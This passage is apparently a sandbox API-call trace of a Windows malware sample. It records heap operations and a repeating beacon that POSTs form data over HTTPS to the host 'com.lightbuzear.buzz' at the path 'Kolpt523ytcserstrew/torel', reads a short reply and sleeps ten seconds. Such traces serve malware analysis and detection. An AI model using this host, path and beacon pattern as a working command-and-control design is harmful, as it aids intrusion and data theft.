[0295.143] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480eae0 | out: hHeap=0x4780000) returned 1 [0295.143] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b4d0 [0295.143] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480eb58 | out: hHeap=0x4780000) returned 1 [0295.143] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x480ec60 [0295.143] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47beb68 [0295.143] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47beb68 | out: hHeap=0x4780000) returned 1 [0295.144] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b4d0 | out: hHeap=0x4780000) returned 1 [0295.144] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47beb68 [0295.144] LoadLibraryW (lpLibFileName="Urlmon.dll") returned 0x71780000 [0295.144] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce610 [0295.145] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce600 [0295.145] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce610 | out: hHeap=0x4780000) returned 1 [0295.145] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce6a0 [0295.145] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce600 | out: hHeap=0x4780000) returned 1 [0295.145] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce710 [0295.145] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6a0 | out: hHeap=0x4780000) returned 1 [0295.145] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce5e0 [0295.145] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 [0295.145] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x480ec78 [0295.146] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5e0 | out: hHeap=0x4780000) returned 1 [0295.146] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x480ecf0 [0295.146] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480ec78 | out: hHeap=0x4780000) returned 1 [0295.146] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b4d0 [0295.146] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480ecf0 | out: hHeap=0x4780000) returned 1 [0295.146] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x47be5a0 [0295.146] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b4d0 | out: hHeap=0x4780000) returned 1 [0295.146] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbe48 [0295.146] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47be5a0 | out: hHeap=0x4780000) returned 1 [0295.146] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47be3e8 [0295.147] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbf28 [0295.147] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47be5a0 [0295.147] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbf28 | out: hHeap=0x4780000) returned 1 [0295.148] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbe48 | out: hHeap=0x4780000) returned 1 [0295.148] GetProcAddress (hModule=0x71780000, lpProcName="ObtainUserAgentString") returned 0x71852f30 [0295.148] ObtainUserAgentString (in: dwOption=0x0, pszUAOut=0xdf2f4, cbSize=0xde1cc | out: pszUAOut="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)", cbSize=0xde1cc) returned 0x0 [0295.148] FreeLibrary (hLibModule=0x71780000) returned 1 [0295.149] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47be5a0 | out: hHeap=0x4780000) returned 1 [0295.149] InternetOpenA (lpszAgent="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0295.149] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47be5a0 [0295.149] InternetConnectA (hInternet=0xcc0004, lpszServerName="com.lightbuzear.buzz", nServerPort=0x1bb, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0295.149] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce670 [0295.149] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce5a0 [0295.150] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0295.150] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce710 [0295.150] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0295.150] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce5e0 [0295.150] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 [0295.150] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce5b0 [0295.150] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5e0 | out: hHeap=0x4780000) returned 1 [0295.150] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x480eae0 [0295.150] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5b0 | out: hHeap=0x4780000) returned 1 [0295.151] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x480ec78 [0295.151] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480eae0 | out: hHeap=0x4780000) returned 1 [0295.152] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b590 [0295.152] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480ec78 | out: hHeap=0x4780000) returned 1 [0295.152] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x480ecf0 [0295.152] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47be640 [0295.152] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47be640 | out: hHeap=0x4780000) returned 1 [0295.161] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b590 | out: hHeap=0x4780000) returned 1 [0295.161] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47be640 [0295.161] LoadLibraryW (lpLibFileName="Wininet.dll") returned 0x71570000 [0295.161] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47be668 [0295.161] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce6a0 [0295.161] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce570 [0295.161] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6a0 | out: hHeap=0x4780000) returned 1 [0295.161] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce6f0 [0295.161] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce570 | out: hHeap=0x4780000) returned 1 [0295.161] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce710 [0295.161] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6f0 | out: hHeap=0x4780000) returned 1 [0295.162] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce5f0 [0295.162] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 [0295.162] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x480eae0 [0295.162] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5f0 | out: hHeap=0x4780000) returned 1 [0295.162] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x480eaf8 [0295.162] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480eae0 | out: hHeap=0x4780000) returned 1 [0295.162] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b590 [0295.162] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480eaf8 | out: hHeap=0x4780000) returned 1 [0295.162] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x480eae0 [0295.162] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47be6e0 [0295.162] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47be6e0 | out: hHeap=0x4780000) returned 1 [0295.162] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b590 | out: hHeap=0x4780000) returned 1 [0295.162] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="POST", lpszObjectName="Kolpt523ytcserstrew/torel", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x800000, dwContext=0x0) returned 0xcc000c [0295.163] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce620 [0295.163] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce630 [0295.163] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce620 | out: hHeap=0x4780000) returned 1 [0295.163] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce680 [0295.163] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce630 | out: hHeap=0x4780000) returned 1 [0295.163] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce5c0 [0295.163] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce680 | out: hHeap=0x4780000) returned 1 [0295.163] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce640 [0295.163] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5c0 | out: hHeap=0x4780000) returned 1 [0295.163] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x480eb58 [0295.163] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce640 | out: hHeap=0x4780000) returned 1 [0295.163] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x480ebd0 [0295.163] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480eb58 | out: hHeap=0x4780000) returned 1 [0295.163] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0295.163] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480ebd0 | out: hHeap=0x4780000) returned 1 [0295.163] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x47be6e0 [0295.163] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0295.164] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbcf8 [0295.164] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47be6e0 | out: hHeap=0x4780000) returned 1 [0295.164] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47be6e0 [0295.164] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbd30 [0295.164] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47be708 [0295.164] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbd30 | out: hHeap=0x4780000) returned 1 [0295.165] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbcf8 | out: hHeap=0x4780000) returned 1 [0295.165] GetProcAddress (hModule=0x71570000, lpProcName="InternetSetOptionA") returned 0x71611dc0 [0295.165] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0xde1c8*, dwBufferLength=0x4) returned 1 [0295.165] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47be708 | out: hHeap=0x4780000) returned 1 [0295.165] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce730 [0295.165] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce6e0 [0295.165] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce730 | out: hHeap=0x4780000) returned 1 [0295.165] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce710 [0295.165] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6e0 | out: hHeap=0x4780000) returned 1 [0295.165] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce620 [0295.165] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 [0295.166] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce5a0 [0295.166] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce620 | out: hHeap=0x4780000) returned 1 [0295.166] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x480ec78 [0295.166] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0295.166] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x480eb58 [0295.166] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480ec78 | out: hHeap=0x4780000) returned 1 [0295.166] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0295.166] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480eb58 | out: hHeap=0x4780000) returned 1 [0295.166] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x47be708 [0295.166] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0295.166] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fba20 [0295.166] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47be708 | out: hHeap=0x4780000) returned 1 [0295.166] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47be708 [0295.166] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fb898 [0295.166] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4800aa0 [0295.167] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fb898 | out: hHeap=0x4780000) returned 1 [0295.177] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fba20 | out: hHeap=0x4780000) returned 1 [0295.177] GetProcAddress (hModule=0x71570000, lpProcName="HttpSendRequestA") returned 0x71638e60 [0295.177] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders="Content-Type:application/x-www-form-urlencoded", dwHeadersLength=0x2e, lpOptional=0x47a6f78*, dwOptionalLength=0x4b2) returned 1 [0296.434] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4800aa0 | out: hHeap=0x4780000) returned 1 [0296.434] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce680 [0296.434] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce670 [0296.435] GetModuleHandleA (lpModuleName="Wininet.dll") returned 0x71570000 [0296.435] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce5e0 [0296.435] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce690 [0296.435] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5e0 | out: hHeap=0x4780000) returned 1 [0296.435] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce5a0 [0296.435] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce690 | out: hHeap=0x4780000) returned 1 [0296.435] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce630 [0296.435] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0296.435] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce5c0 [0296.435] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce630 | out: hHeap=0x4780000) returned 1 [0296.435] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x480ec78 [0296.435] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5c0 | out: hHeap=0x4780000) returned 1 [0296.435] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x480eb58 [0296.435] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480ec78 | out: hHeap=0x4780000) returned 1 [0296.435] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0296.436] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480eb58 | out: hHeap=0x4780000) returned 1 [0296.436] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x4800be0 [0296.436] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0296.436] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbe48 [0296.436] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4800be0 | out: hHeap=0x4780000) returned 1 [0296.436] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4800aa0 [0296.436] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbcf8 [0296.436] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4800be0 [0296.436] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbcf8 | out: hHeap=0x4780000) returned 1 [0296.436] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbe48 | out: hHeap=0x4780000) returned 1 [0296.437] GetProcAddress (hModule=0x71570000, lpProcName="InternetReadFile") returned 0x715f7320 [0296.437] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xde2f4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0xde290 | out: lpBuffer=0xde2f4*, lpdwNumberOfBytesRead=0xde290*=0x5) returned 1 [0296.437] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4800be0 | out: hHeap=0x4780000) returned 1 [0296.437] GetModuleHandleA (lpModuleName="Wininet.dll") returned 0x71570000 [0296.437] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce5a0 [0296.437] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce620 [0296.437] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0296.437] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce600 [0296.437] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce620 | out: hHeap=0x4780000) returned 1 [0296.437] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce570 [0296.437] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce600 | out: hHeap=0x4780000) returned 1 [0296.437] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce690 [0296.437] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce570 | out: hHeap=0x4780000) returned 1 [0296.437] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x480eb58 [0296.438] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce690 | out: hHeap=0x4780000) returned 1 [0296.438] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x480ebd0 [0296.438] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480eb58 | out: hHeap=0x4780000) returned 1 [0296.438] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0296.438] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480ebd0 | out: hHeap=0x4780000) returned 1 [0296.438] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x4800be0 [0296.438] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0296.438] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbf28 [0296.438] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4800be0 | out: hHeap=0x4780000) returned 1 [0296.438] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4800be0 [0296.438] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fba20 [0296.438] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4800578 [0296.438] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fba20 | out: hHeap=0x4780000) returned 1 [0296.439] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbf28 | out: hHeap=0x4780000) returned 1 [0296.439] GetProcAddress (hModule=0x71570000, lpProcName="InternetReadFile") returned 0x715f7320 [0296.439] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xde2f4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0xde290 | out: lpBuffer=0xde2f4*, lpdwNumberOfBytesRead=0xde290*=0x0) returned 1 [0296.439] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4800578 | out: hHeap=0x4780000) returned 1 [0296.439] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0296.440] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0296.440] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0296.440] FreeLibrary (hLibModule=0x71570000) returned 1 [0296.440] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0296.440] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce680 | out: hHeap=0x4780000) returned 1 [0296.440] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47be668 | out: hHeap=0x4780000) returned 1 [0296.441] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47be640 | out: hHeap=0x4780000) returned 1 [0296.441] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47be5a0 | out: hHeap=0x4780000) returned 1 [0296.441] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47beb68 | out: hHeap=0x4780000) returned 1 [0296.441] Sleep (dwMilliseconds=0x2710) [0296.452] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce5b0 [0296.452] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce750 [0296.452] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5b0 | out: hHeap=0x4780000) returned 1 [0296.452] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce610 [0296.452] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce750 | out: hHeap=0x4780000) returned 1 [0296.452] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce640 [0296.452] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce610 | out: hHeap=0x4780000) returned 1 [0296.452] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce5a0 [0296.452] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce640 | out: hHeap=0x4780000) returned 1 [0296.452] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x480ed20 [0296.452] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0296.452] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x480eaf8 [0296.452] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480ed20 | out: hHeap=0x4780000) returned 1 [0296.452] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b590 [0296.453] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480eaf8 | out: hHeap=0x4780000) returned 1 [0296.453] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x480ec00 [0296.453] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4800578 [0296.453] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4800578 | out: hHeap=0x4780000) returned 1 [0296.453] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b590 | out: hHeap=0x4780000) returned 1 [0296.453] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4800578 [0296.453] LoadLibraryW (lpLibFileName="Urlmon.dll") returned 0x71780000 [0296.454] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce5a0 [0296.454] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce670 [0296.454] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0296.454] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce610 [0296.454] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0296.454] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce740 [0296.454] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce610 | out: hHeap=0x4780000) returned 1 [0296.454] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce630 [0296.454] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce740 | out: hHeap=0x4780000) returned 1 [0296.454] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x480ed20 [0296.454] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce630 | out: hHeap=0x4780000) returned 1 [0296.454] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x480eaf8 [0296.454] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480ed20 | out: hHeap=0x4780000) returned 1 [0296.454] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b4d0 [0296.454] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480eaf8 | out: hHeap=0x4780000) returned 1 [0296.454] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x47beac8 [0296.454] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b4d0 | out: 